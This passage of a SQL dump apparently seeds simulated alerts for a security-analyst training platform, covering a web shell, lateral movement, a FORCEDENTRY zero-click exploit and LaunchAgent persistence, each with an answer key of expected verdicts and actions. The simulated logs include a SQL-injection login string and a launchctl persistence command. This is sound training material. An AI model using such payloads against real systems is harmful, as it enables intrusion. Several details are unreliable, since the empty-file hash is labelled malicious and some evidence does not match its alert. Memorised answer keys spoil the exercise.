username.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1060, 'Web Shell Deployment Detected', 'high', 'Web server logs', 'A web shell has been detected on the server, indicating the attacker has deployed it to maintain persistent access and execute remote commands. The web shell was uploaded to the server following initial access.', 'Persistence', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:34Z\",\"web_server\":\"Apache/2.4.41 (Ubuntu)\",\"client_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"http_request\":\"POST /uploads/suspicious.php HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"filename\":\"suspicious.php\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"webadmin\",\"status_code\":200,\"response_size\":345}', '2026-01-24 03:32:45', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple web shell attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"suspicious.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Common web shell filename used by attackers\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known web shell\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"webadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Users\",\"verdict\":\"clean\",\"details\":\"Authorized user but potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"},{\"timestamp\":\"2026-02-01T20:31:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"},{\"timestamp\":\"2026-02-01T20:30:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"},{\"timestamp\":\"2026-02-01T20:29:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"},{\"timestamp\":\"2026-02-01T20:28:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1061, 'Lateral Movement Initiated', 'high', 'Internal network monitoring', 'With persistence established, the attacker is now exploring the internal network, attempting to access critical systems and harvest sensitive data. The attacker used compromised credentials to access a sensitive server and attempted to move laterally to other systems.', 'Lateral Movement', 'T1021', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T14:32:22Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"192.168.1.100\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"action\":\"network_access\",\"destination_port\":445,\"protocol\":\"SMB\",\"file_accessed\":\"financial_data.xlsx\",\"hash\":\"8d91f5f3cd7c2b9a9a3f4e2f1c3d5e4b\",\"status\":\"success\"}', '2026-01-24 03:32:45', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Destination sensitive server targeted in lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with previous campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Compromised internal account used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"8d91f5f3cd7c2b9a9a3f4e2f1c3d5e4b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with lateral movement tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1062, 'Alert: Suspicious iMessage Activity Detected', 'high', 'iOS Device Logs', 'A crafted iMessage was detected, exploiting a known vulnerability to gain initial access to the target device without user interaction. The message originated from an external IP known for malicious activities.', 'Initial Access', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:52Z\",\"device_id\":\"ios_device_123456\",\"user\":\"user@example.com\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"message_id\":\"msg-20231015-01\",\"exploit_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"attachment.jpg\",\"status\":\"Delivered\",\"exploit_detected\":true}', '2026-01-24 03:33:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple zero-click exploits.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known iMessage exploit payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1063, 'Alert: FORCEDENTRY Vulnerability Exploited', 'critical', 'Security Incident and Event Management (SIEM) System', 'A zero-click exploit successfully triggered the FORCEDENTRY vulnerability, allowing the attacker to execute arbitrary code on the target\'s device. This indicates a severe breach that requires immediate attention.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:55Z\",\"event_id\":\"987654321\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"malicious_filename\":\"forgedentry_payload.bin\",\"malicious_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"execute\",\"vulnerability_triggered\":\"FORCEDENTRY\",\"device\":\"iPhone13,4\",\"os_version\":\"iOS 14.8\"}', '2026-01-24 03:33:29', '2026-02-16 17:48:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with multiple APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal device IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"forgedentry_payload.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Payload used in exploitation of FORCEDENTRY vulnerability.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1064, 'Alert: Persistence Mechanism Identified', 'medium', 'Mobile Device Management (MDM) Logs', 'A post-exploitation script has been executed on the target device to establish a persistent mechanism. This backdoor allows the attacker to maintain access to the device beyond the initial compromise.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"device_id\":\"device_12345\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.15\",\"malicious_ip\":\"203.0.113.45\",\"file_created\":\"/Library/LaunchAgents/com.example.malicious.plist\",\"hash\":\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\",\"action\":\"script_execution\",\"description\":\"A script was executed to create a LaunchAgent for persistence.\",\"command\":\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\"}', '2026-01-24 03:33:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"/Library/LaunchAgents/com.example.malicious.plist\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalAnalysis\",\"verdict\":\"malicious\",\"details\":\"File used for persistence by malware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalUserDB\",\"verdict\":\"internal\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 